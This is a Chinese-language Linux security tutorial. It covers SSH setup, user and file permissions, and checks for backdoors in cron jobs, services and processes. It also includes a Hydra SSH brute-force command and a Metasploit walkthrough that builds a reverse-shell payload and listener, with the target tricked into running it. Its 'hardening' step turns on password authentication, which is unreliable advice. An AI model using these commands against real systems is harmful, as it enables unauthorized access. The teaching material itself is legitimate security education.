Linux 系统安全实战:从服务防护到入侵检测
一、Linux 系统服务安全:以 SSH 协议为例
SSH(Secure Shell)是 Linux 系统中最常用的远程管理协议,类似 Windows 的 RDP,但以命令行交互为主,实现 “远程如同本地操作” 的高效管理。同时,它也是攻击者暴力破解的重点目标,因此其安全配置是系统防护的第一道防线。
1. 环境配置:SSH 服务安装与基础加固
不同 Linux 发行版的包管理器不同,Debian/Ubuntu 使用apt,CentOS/RHEL 使用yum,核心操作如下:
表格
| 操作 | Ubuntu (APT) | CentOS (YUM) |
|---|---|---|
| 更新软件源 | apt update | yum clean all && yum makecache |
| 升级软件包 | apt upgrade | yum upgrade |
| 安装 SSH 服务 | apt install openssh-server | yum install openssh-server |
关键安全配置:编辑 SSH 配置文件/etc/ssh/sshd_config,开启密码认证并限制登录权限:
bash
运行
nano /etc/ssh/sshd_config # 启用密码认证 PasswordAuthentication yes # 重启SSH服务使配置生效 service ssh restart2. 攻击实战:Hydra 暴力破解 SSH
Hydra 是一款开源的密码破解工具,支持 SSH、FTP 等多种协议,常被用于渗透测试中的暴力破解。其基础语法为:
bash
运行
hydra -l [用户名] -P [密码字典路径] ssh://[目标IP]⚠️法律提示:未经授权对系统进行密码破解属于违法行为,仅可在自有或获得明确许可的系统上进行测试。
二、Linux 用户与权限管理:最小权限原则
用户与权限是 Linux 安全的核心,遵循 “最小权限原则” 是避免权限滥用的关键。
1. 用户与组管理
- 用户分类:
- 系统用户:UID < 1000,用于运行系统服务;
- 普通用户:UID ≥ 1000,由管理员创建,用于日常操作;
- 管理员用户:UID = 0(即 root 用户),拥有系统最高权限。
- 核心命令:
bash
运行
# 创建用户并自动生成家目录 useradd -m [用户名] # 设置用户密码 passwd [用户名] # 将用户加入sudo组(赋予管理员权限) usermod -aG sudo [用户名]
2. 文件权限与所有权
Linux 文件权限通过rwx(读 / 写 / 执行)三位一组,分别对应所有者、所属组、其他用户,同时支持数字权限表示:
r=4、w=2、x=1,例如rwxr-x---对应数字权限750。
核心命令:
bash
运行
# 查看文件详细权限 ls -l # 修改文件所有者与所属组 chown [用户]:[组] [文件名] # 修改文件权限(数字方式) chmod 750 [文件名] # 修改文件权限(符号方式) chmod u+x [文件名] # 为所有者添加执行权限三、Linux 入侵检测:木马与后门排查
攻击者在获取系统权限后,通常会植入木马或后门以维持访问,因此及时发现并清除这类恶意程序是入侵检测的核心。
1. 木马与后门基础
木马是一种隐藏在正常程序中的恶意代码,可被攻击者远程控制;后门则是攻击者为方便再次入侵而留下的 “隐秘通道”,常见于计划任务、自启动服务中。
2. 实战:Metasploit 生成与植入木马
Metasploit Framework(MSF)是渗透测试中最常用的工具集,可用于生成、传输和控制木马:
- 生成木马:
bash
运行
msfvenom -p linux/x64/shell_reverse_tcp LHOST=[攻击机IP] LPORT=[端口] -f elf -o shell.elf - 启动监听:
bash
运行
msfconsole use exploit/multi/handler set PAYLOAD linux/x64/shell_reverse_tcp set LHOST [攻击机IP] set LPORT [端口] run - 目标机执行:攻击者通过社会工程学或文件上传漏洞,诱导目标机执行
shell.elf,即可获得反向 Shell 控制权限。
3. 入侵痕迹排查
- 计划任务排查:
bash
运行
crontab -l # 查看当前用户计划任务 cat /etc/crontab # 查看系统级计划任务 - 自启动服务排查:
bash
运行
systemctl list-unit-files --type=service # 查看所有自启动服务 - 异常进程排查:
bash
运行
ps -ef # 查看所有进程 netstat -antp # 查看网络连接与对应进程
四、总结与安全建议
Linux 系统安全是一个持续对抗的过程,核心在于 **“预防为主、检测为辅”**:
- 服务最小化:关闭不必要的端口与服务,减少攻击面;
- 权限最小化:避免直接使用 root 用户操作,通过
sudo分配有限权限; - 日志审计:开启系统日志与服务日志,定期审计异常登录与操作;
- 及时更新:定期更新系统与软件包,修复已知漏洞。